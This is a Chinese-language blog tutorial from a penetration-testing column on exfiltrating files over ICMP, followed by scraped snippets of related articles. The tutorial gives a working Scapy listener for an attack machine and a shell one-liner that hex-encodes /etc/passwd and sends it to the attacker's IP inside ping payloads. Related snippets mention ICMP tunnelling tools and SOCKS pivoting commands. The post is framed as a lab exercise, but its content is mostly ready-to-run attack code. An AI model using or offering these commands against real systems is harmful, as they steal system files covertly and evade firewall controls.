ICMP文件传输——超详细步骤

最新推荐文章于 2025-04-26 00:37:17 发布
最新推荐文章于 2025-04-26 00:37:17 发布
阅读量1.2k 收藏 1
点赞数 2
分类专栏: 渗透 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xwj1590/article/details/121782363
版权

环境搭建:

       攻击机kali:192.168.159.129

       服务器centos:192.168.159.10

在攻击机上运行如下脚本(将此脚本在kali中另存为.py的文件,使用“python3 文件名”命令运行该、该脚本)

import sys

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)

def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)

在服务器执行如下命令:(在服务器上执行此命令,攻击机上才能有信息出现)

xxd -p -c 4 /etc/passwd | while read line; do ping -c 1 -p $line 192.168.159.129; done

计网夯实基础——IP、ICMP协议篇
m0_60649266的博客
05-24 522
到了这里有一个问题自然就明了了,TCP分段的原因是MSS,IP分片的原因是MTU,由于一直有MSS<=MTU,很明显,分段后的每一段TCP报文段再加上IP首部后的长度不可能超过MTU,因此也就不需要在网络层进行IP分片了。首部长度是指首部占32bit字的数目,因为4位的最大值为15,因此首部最长为60字节,也即是说选项部分的最大值为40字节,不够4的倍数,要用0填充,使数据部分的起始地址为4的倍数。首部的每一行是一个32位字的单位,最高位在左边,为0bit,最低位在右边,为31bit。
Java——TCP/IP超详细总结
用代码征服天下
12-24 2254
网络的基础知识 一、协议 1、简介: 在计算机网络与信息通信领域里,人们经常提及“协议”一词。互联网中常用的具有代表性的协议有IP、TCP、HTTP等。而LAN(局域网)中常用的协议有IPX/SPX”等。 下面通过通俗一点的方式来解释一下协议: 有三个人A、B、C。A只会说汉语、B只会说英语、而C既会说汉语又会说英语。现在A与B要聊天,他们之间该如何沟通呢?若A与C要聊天,又会怎样?这时如果我们...
基于ICMP的隐蔽传输/隐蔽通信代码(包含实验报告+完整说明)可直接运行
05-11
使用Python编写的,基于ICMP隐蔽传输的实验代码,包含第三方依赖库以及详细的配置过程,包含详细的实验报告,有创新点,可实现Windows到Windows、Windows到Ubuntu间的隐蔽通信。也可在本地单独测试。
红队隧道应用篇之ICMP协议传输(八)
xf555er的博客
09-06 589
IcmpTunnel工具是jamesbarlow师傅用C语言写的, 通过创虚拟网卡, 使用ICMP协议传输IP流量, 以此来通过有状态的防火墙和NAT进行隧道传输工具下载地址: https://github.com/jamesbarlow/icmptunnel要求攻击机(服务端)与目标主机(客户端)是linux环境目标主机能够ping通攻击机。
ICMP协议-ARP协议-传输层协议-数据转发过程-VRP基础-命令行基础-文件系统基础-VRP系统基础——总结
Knowledge warehouse
07-10 1486
一、ICMP协议 1、ICMP协议是网际控制信息协议,主要用来在网络设备间传递各种差错和控制信息,和收集各种网络信息、诊断和排除各种网络故障等方面信息。例如:网络通不通、主机是否可达路由是否可用等网络本的 2、ICMP报文是在IPI报文内部传输的。 3、我们都只到IP协议是不可靠的协议,它不能保障IP数据报能够成功的到达目的主机,也无法进行差错控制,但是ICMP...
ICMP协议
sunqizheng1253的博客
06-18 690
ICMP协议是一种在网络通信中常用的协议,它主要用来传输控制信息和故障诊断信息。本文介绍ICMP协议。
轻松构建并发送ICMP数据包
qq_44681462的博客
09-12 1583
而后选择正在使用的网卡 点击,之后我们点击选择协议 选择ICMP下的回显请求包。可以看到它帮我们自动填写了一些参数。它会列出目前正在使用的网卡等一些信息,我们勾选发送数据包(注:不勾选发送数据包 直接点击接口是抓包页面)。这里填的目的MAC是 11.11.11.11 网关的MAC地址。可以看到的确成功了,并且收到了网关的应答消息 数据也是刚才我们输入的。从零构造并发送一个数据包确实不容易,但是我们有更简单的方法。,点击发送后我们看到真的给网关发送了一个应答消息(reply)。我们打开NDebug。
全方位网络调试利器——超级调试助手
在调试过程中,将发送和接收的数据保存下来是非常重要的步骤,它可以帮助分析通信过程中的异常、错误以及性能问题,便于后续的回溯和故障排查。 【标签】中的“Modbus”表明该超级调试助手是特别针对支持Modbus...
网络服务——网络层:IP、ICMP、ARP与传输层:TCP、UDP
weixin_56667320的博客
04-01 2550
一、网络层 网络层的功能 ※定义了基于IP地址的逻辑功能; ※连接不同的媒介类型; ※选择数据通过网络的最佳路径。 网络层主要的媒介是路由器,同一个网络不需要路由器,不同网络就需要使用路由器,网络层的主要协议是:IP;其余四个协议:ICMP、IGMP、ARP、RARP是围绕IP展开的。 1、IP数据包格式:版本:识别是IPV4(OX40)还是IPV6,基本上是IPV4; 首部长度:不带数据的IP包头部长度; 优先级与服务类型:定义IP数据包是否优先传送; 总长度:定义IP数据包总长度是多少; 标识符:用于I
深入理解 `.pcapng` 文件 ——Scapy 和 Pyshark
最新发布
Rhett_Butler0922的博客
04-26 763
元数据分析用 Pyshark 提取 SHB、IDB、NRB 的元数据。特征提取用 Scapy 解析复杂协议和应用层数据。用 Pyshark 快速提取统计和行为特征。数据预处理用 Pandas 清洗数据(去除空值、异常值)。归一化/标准化特征。特征存储保存为 CSV 或 Parquet,供机器学习使用。.pcapng是一种功能强大、模块化的网络数据包存储格式,适合 IoT 流量指纹和分类研究。其块结构(SHB、IDB、EPB 等)支持丰富的元数据和多接口捕获,便于提取多维度特征。
icmp隧道手工操作
weixin_30654419的博客
03-31 507
ICMP协议被用于检测网络连通状态的协议,通常情况下,防火墙会默认放过该协议。 渗透测试中经常出现一种情况是,我们通过某一种方式取得了一台主机的权限,得到了一些文件,比如域hash,密码文件之类的东西,需要回传至本地进行破解,但是防火墙阻断了由内网发起请求的协议,只有icmp没有被阻断,而我们又需要回传文件,这个时候就可以利用icmp隧道来进行传输。 【基本步骤】如下: (1)、将所要传输的...
网络通信基础:ICMP基础通识
HongDaYu的搬砖之路
08-25 3388
前面已经对基础的osi的网络通用模型进行了讲解 所以在知道了什么是OSI的7层网络模型之后,对ping的理解就会更加透彻一些 但是在讲ping包以前会对底层的协议包的组包方式进行了解,同时也算是对基础的一个巩固,做运维的同学会对ping非常熟悉,但是具体的ping你的ping具体是哪一层的通信,估计大家不是很了解。所以今天对此知识进行梳理(因为没梳理之前我也不知道,所以咱们推导一下) ...
如何发送icmp数据包
zhci31462的专栏
05-01 5419
typedef   struct   iphdr   {      unsigned   int   version:4;   //   IP版本号,4表示IPV4          unsigned   int   h_len:4;   //   4位首部长度          unsigned   char   tos;   //   8位服务类型TOS         
ICMP数据包-实战分析
热门推荐
Koma的主页
07-13 1万+
昨天有位学习网络编程的兄弟对于TCP/IP里一些协议与概念性的东西很模糊,想让我给他讲解一下ICMP。这不正有空,于是乎随手抓了个ICMP的包给他分析了一下: (前面这些概念性的东西,这是基础的,必看!) ICMP报文包含在IP数据报中,属于IP的一个用户,IP头部就在ICMP报文的前面。所以一个ICMP报文包括IP头部、ICMP头部和ICMP报文(见图表,ICMP报文的结构和几种常见
渗透测试入门4之内网跨边界应用
鹿鸣天涯
04-03 761
渗透测试入门4之内网跨边界应用 内网跨边界转发 NC端口转发 LCX端口转发 nps 代理脚本 Tunna Reduh ... 内网跨边界代理穿透 EW 正向 SOCKS v5 服务器: ./ew -s ssocksd -l 1080 反弹 SOCKS v5 服务器: a) 先在一台具有公网 ip 的主机A上运行以下命令: $ ./ew -s rcsocks ...
ICMP报文类型
weixin_33971205的博客
05-25 217
ICMP全称Internet Control Message Protocol(Internet控制消息协议)。提起ICMP,一些人可能会感到陌生,实际上,ICMP与我们息息相关。在网络体系结构的各层次中,都需要控制,而不同的层次有不同的分工和控制内容,IP层的控制功能是最复杂的,主要负责差错控制、拥塞控制等,任何控制都是建立在信息的基础之上的,在基于IP数据报的网络体系中,设备必须自己处理数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值